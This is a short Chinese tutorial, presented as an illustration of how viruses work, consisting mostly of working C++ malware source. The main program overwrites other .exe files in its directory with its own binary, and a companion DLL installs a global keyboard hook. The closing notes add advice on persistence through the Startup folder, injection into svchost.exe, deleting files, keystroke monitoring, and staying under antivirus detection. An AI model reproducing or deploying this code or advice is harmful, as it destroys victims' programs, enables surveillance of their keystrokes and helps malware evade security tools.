病毒原理实例

#include <iostream>
#include <windows.h>
#include <errno.h>
using namespace std;

HMODULE g_hModule = NULL;

// 感染同目录下的exe
void Infection()
{
	// 把自己打开，准备感染
	char szFullFileName[MAX_PATH] = "";
	GetModuleFileName(NULL, szFullFileName, sizeof(szFullFileName) / sizeof(char));
	char szFileName[64] = "";
	const char *pChr = strrchr(szFullFileName, '\\');
	if (!pChr)
	{
		return ;
	}
	strcpy_s(szFileName, sizeof(szFileName), pChr + 1);
	FILE *pSelfFile = NULL;

	errno_t err = fopen_s(&pSelfFile, szFullFileName, "rb");
	if (err)
	{
		cerr << err << endl;
		return ;
	}

	fseek(pSelfFile, 0, SEEK_END);
	int nMySize = ftell(pSelfFile);
	fseek(pSelfFile, 0, SEEK_SET);

	// 把自己读入内存
	char *pszMySelf = new char[nMySize];
	if (!pszMySelf)
	{
		fclose(pSelfFile);
		return ;
	}
	memset(pszMySelf, 0, nMySize);
	fread(pszMySelf, nMySize / 10, 10, pSelfFile);

	// 取当前目录，准备搜索
	char szDir[MAX_PATH] = "";
	GetCurrentDirectory(sizeof(szDir) / sizeof(char), szDir);

	char szSearchFile[MAX_PATH] = "";
	strcpy_s(szSearchFile, sizeof(szSearchFile), szDir);
	strcat_s(szSearchFile, sizeof(szSearchFile), "\\*");

	WIN32_FIND_DATA fd;
	memset(&fd, 0, sizeof(WIN32_FIND_DATA));

	HANDLE hFile = FindFirstFile(szSearchFile, &fd);
	if (hFile == INVALID_HANDLE_VALUE)
	{
		cerr << GetLastError() << endl;
		fclose(pSelfFile);
		return ;
	}

	// 循环读取exe文件，开始感染
	while(TRUE)
	{
		if (FALSE == FindNextFile(hFile, &fd))
		{
			break;
		}

		if (strcmp(fd.cFileName, szFileName) == 0)
		{
			continue ;
		}

		if (strstr(fd.cFileName, ".exe") != NULL)
		{
			char szDstFileFullPath[MAX_PATH] = "";
			strcpy_s(szDstFileFullPath, sizeof(szDstFileFullPath), szDir);
			strcat_s(szDstFileFullPath, sizeof(szDstFileFullPath), "\\");
			strcat_s(szDstFileFullPath, sizeof(szDstFileFullPath), fd.cFileName);

			FILE *pFile = NULL;
			fopen_s(&pFile, szDstFileFullPath, "r+b");
			fseek(pFile, 0, SEEK_SET);
			fwrite(pszMySelf, nMySize / 10, 10, pFile);
			fclose(pFile);

			cout << "已感染文件：" << szDstFileFullPath << endl;
		}
		else
		{
//			remove(fd.cFileName);
		}
	}

	fclose(pSelfFile);
	delete []pszMySelf;
}

void CreateKeyboardHook()
{
	g_hModule = LoadLibrary("Hook.dll");
	if (!g_hModule)
	{
		return ;
	}

	typedef void (*HookFunc)();
	HookFunc myHookFunc = (HookFunc)GetProcAddress(g_hModule, "SetHook");
	if (!myHookFunc)
	{
		FreeLibrary(g_hModule);
		return ;
	}
	myHookFunc();
}

int main()
{
	Infection();
	CreateKeyboardHook();

	system("pause");

	typedef void (*UnHookFunc)();
	UnHookFunc unHookFunc = (UnHookFunc)GetProcAddress(g_hModule, "UnHook");
	if (!unHookFunc)
	{
		FreeLibrary(g_hModule);
		return 1;
	}
	unHookFunc();

	FreeLibrary(g_hModule);

	return 0;
}

#include <windows.h>

extern "C" _declspec(dllexport) void SetHook();
extern "C" _declspec(dllexport) void UnHook();

HHOOK g_KeyBoardHook = NULL;

LRESULT CALLBACK KeyBoardHook(int nCode, WPARAM wParam, LPARAM lParam)
{
	if (49 == wParam)
	{
		wParam = 50;
		::MessageBox(NULL, "你按了A，我帮你改成B", "关掉吧", MB_OK);
		return CallNextHookEx(g_KeyBoardHook, nCode, wParam, lParam);
	}
	else if (0 == wParam)
	{
		UnhookWindowsHookEx(g_KeyBoardHook);
	}
	return 1;
}

void SetHook()
{
	g_KeyBoardHook = SetWindowsHookEx(WH_KEYBOARD, KeyBoardHook, GetModuleHandle("Hook"), 0);
}

void UnHook()
{
	UnhookWindowsHookEx(g_KeyBoardHook);
}

以上两个程序只是为了说明病毒的原理，其实，这只算是一段恶意的代码，第一段代码是主程序，编译成exe，第二段代码是dll文件，先编译一下dll文件，把lib文件放到主程序运行目录下，把dll文件放到病毒程序运行目录下，就可以了

1、病毒若想要自动运行，很简单，只要把我们的exe放入开始菜单的启动项就可以了，每次开机都会自动运行，如果高级点的话，就注入到别的进程里去吧，如svchost.exe，具体实现，下次有时间再讲解。

2、病毒感染，这是个很简单的过程，就是打开目标文件，把病毒文件一个字节一个字节的读出来，然后写入到目标文件，这样，目标文件就拥有与病毒文件相同的功能，也就是，如果目标是*.exe文件，那么，目标文件运行后也会跟源病毒文件做相同的事

3、病毒破坏作用，这个也很简单，想破坏个东西还不容易吗，删除文件就属于破坏行为了。如果想监控客户机，就安装个钩子吧，就像上面的代码一样，安装了个键盘钩子。

4、现在的计算机都安装有杀毒软件，想要入侵怎么办？最简单的办法，就是写个简单的破坏软件（这种软件杀毒软件不会报，杀毒软件是个苦差啊，有些是不能报的），就像上面的那两段代码，去掉钩子，杀毒软件就不会报了，接下来，就是简单的破坏了，只要不是写注册表，不安装钩子，不自动运行，杀软一般都不会报，当然，这也是去了病毒程序最好玩的地方